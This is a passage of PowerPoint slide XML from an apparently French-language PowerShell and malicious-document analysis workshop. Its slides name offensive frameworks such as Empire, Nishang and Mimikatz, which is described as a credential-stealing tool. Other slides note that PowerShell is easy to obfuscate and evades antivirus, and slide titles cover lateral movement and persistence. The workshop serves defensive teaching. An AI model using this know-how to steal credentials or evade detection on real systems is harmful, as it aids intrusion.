            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>:  Il s'agit d'un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/>
              <a:t>modulaire de post-exploitation, fournissant un environnement de type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nishang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>:  une collection de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>scripts offrant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des scanners, des outils de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>backdooring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, d'escalade </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>de privilèges, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>et de persistance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PS&gt;Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: combine différents projets PowerShell en une console PowerShell personnalisée et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>autonome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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Invoke-Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> :  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hacktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> qui extrait les informations d'identification et les jetons des ordinateurs Windows. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>L'outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>peut également effectuer diverses manipulations de jetons et attaques d'usurpation d'identité. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30414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1321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MALDOC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0" y="1961712"/>
            <a:ext cx="1285884" cy="1285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0" y="1931566"/>
            <a:ext cx="1316030" cy="131603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351314" y="2461846"/>
            <a:ext cx="2815309" cy="21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MALDOC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23" y="4009124"/>
            <a:ext cx="1319797" cy="1319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3" y="4015879"/>
            <a:ext cx="1287801" cy="1287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0" y="1961712"/>
            <a:ext cx="1285884" cy="1285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0" y="1931566"/>
            <a:ext cx="1316030" cy="131603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351314" y="2461846"/>
            <a:ext cx="2815309" cy="21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Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351313" y="4669022"/>
            <a:ext cx="2815309" cy="21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15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MALDOC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23" y="4009124"/>
            <a:ext cx="1319797" cy="1319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3" y="4015879"/>
            <a:ext cx="1287801" cy="1287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729" y="2678611"/>
            <a:ext cx="1337268" cy="1337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0" y="1961712"/>
            <a:ext cx="1285884" cy="1285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0" y="1931566"/>
            <a:ext cx="1316030" cy="131603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351314" y="2461846"/>
            <a:ext cx="2815309" cy="21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Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351313" y="4669022"/>
            <a:ext cx="2815309" cy="21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ight Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1123787">
            <a:off x="6434272" y="2796654"/>
            <a:ext cx="2436839" cy="214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 rot="20132883">
            <a:off x="6425267" y="4136233"/>
            <a:ext cx="2436839" cy="232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Language de script puissant et environment d ’execution  .NET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Introduit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in 2005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Utilisé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pour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automatisation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taches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système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et management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Accès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total aux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fonctionalités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sytème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(WMI,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COM,etc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Devenu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open source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2016 et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porté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sur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plusieurs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plateformes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491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FONCTIONNALITES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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmdlets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–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implémentent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commandes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spécifiques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modèle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d'appellation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verbe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-nom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ex.Get-ChildItem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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Import-Module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étend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les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fonctionalités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du framework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    -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espaces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d'exécution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restreints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(constrained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run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spaces) – limitation de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l’execution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par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liste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blanche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     - scripts avec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l’extension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.ps1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IDE pour les scripts – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ISE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(integrated scripting environment)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19806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UTILISATION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-Versatile avec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accès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à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l’OS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Installé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par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défault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    - Execution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mémoire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    -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Génere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très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peu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de traces par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défault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es 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capacités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d'accès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à distance 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    - Facile a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obscurcir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et difficile à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detecter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par les AV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126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0714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PS1 KILL CHAIN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1546" y="2816906"/>
            <a:ext cx="2666074" cy="92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EXECUTION POLICY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0610" y="2816906"/>
            <a:ext cx="2666074" cy="92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LATERAL MOVEMENT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1802" y="4974363"/>
            <a:ext cx="2427540" cy="92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SCRIPT EXECUTION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1481" y="4974363"/>
            <a:ext cx="2666074" cy="92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PERSISTENCE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77106" y="4052454"/>
            <a:ext cx="281530" cy="298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 flipV="1">
            <a:off x="1038115" y="4017270"/>
            <a:ext cx="52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1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66753" y="5168133"/>
            <a:ext cx="262247" cy="26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3166753" y="5104376"/>
            <a:ext cx="3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2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27903" y="3971919"/>
            <a:ext cx="304229" cy="296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827903" y="3943117"/>
            <a:ext cx="3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3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52070" y="5155110"/>
            <a:ext cx="280737" cy="26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7614869" y="5093986"/>
            <a:ext cx="3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4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013364" y="3823855"/>
            <a:ext cx="665018" cy="95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Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4965592" y="3834467"/>
            <a:ext cx="665018" cy="95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wn Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7970010" y="3819475"/>
            <a:ext cx="665018" cy="95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Maldoc Analysis Workshop p.1</Template>
  <TotalTime>0</TotalTime>
  <Words>1274</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>162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 2</vt:lpstr>
      <vt:lpstr>DividendVTI</vt:lpstr>
      <vt:lpstr>POWERSHELL ANALYSIS WORKSHOP </vt:lpstr>
      <vt:lpstr>MALDOC</vt:lpstr>
      <vt:lpstr>MALDOC</vt:lpstr>
      <vt:lpstr>MALDOC</vt:lpstr>
      <vt:lpstr>POWERSHELL </vt:lpstr>
      <vt:lpstr>FONCTIONNALITES</vt:lpstr>
      <vt:lpstr>UTILISATION </vt:lpstr>
      <vt:lpstr>DEMO TIME</vt:lpstr>
      <vt:lpstr>PS1 KILL CHAIN</vt:lpstr>
      <vt:lpstr>POLITIQUES D’EXECUTION</vt:lpstr>
      <vt:lpstr>POLITIQUES D’EXECUTION</vt:lpstr>
      <vt:lpstr>EXECUTION DU SCrIPT</vt:lpstr>
      <vt:lpstr>EXECUTION DU SCrIPT</vt:lpstr>
      <vt:lpstr>VECTEURS D’ATTAQUE</vt:lpstr>
      <vt:lpstr>LATERAL MOVEMENT</vt:lpstr>
      <vt:lpstr>PERSISTENCE</vt:lpstr>
      <vt:lpstr>Obscurcissement des donnees</vt:lpstr>
      <vt:lpstr>FRAMEWORKS OFFENSIVES</vt:lpstr>
      <vt:lpstr>DEMO TIME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2021-01-15T11:29:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-03-17T15:23:46Z</dcterms:modified>
</cp:coreProperties>
</file>